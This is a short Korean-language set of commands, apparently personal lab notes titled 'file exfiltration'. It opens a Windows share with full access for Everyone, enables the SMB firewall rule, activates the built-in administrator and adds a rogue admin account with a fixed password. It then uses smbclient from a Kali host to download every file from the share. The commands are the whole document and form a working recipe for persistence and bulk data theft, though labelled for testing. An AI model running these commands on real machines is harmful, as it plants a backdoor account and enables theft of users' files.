 파일빼내오기

# 공유 폴더 생성 (테스트용도 )
mkdir C:\shared

# 공유 설정 (Everyone에 FULL 권한)  <- 폴더 아무거나 상관없다. Users 아래로 지정하면된다 빼내올 수 있다.
net share shared=C:\shared /grant:Everyone,FULL

# SMB 방화벽 설정
netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=yes

# 관리자 계정 생성이 가능하도록 활성화
net user administrator /active:yes

# 관리자 계정 생성
net user admin2 Passw0rd! /add
net localgroup Administrators admin2 /add





# (KALI) SMB 접속
cd /home/kali/Documents/upload

smbclient //10.0.2.4/shared 'Passw0rd!' -U 'admin2'

prompt off   # 매번 물어보지 않음
mget *       # 모든 파일 다운로드
quit

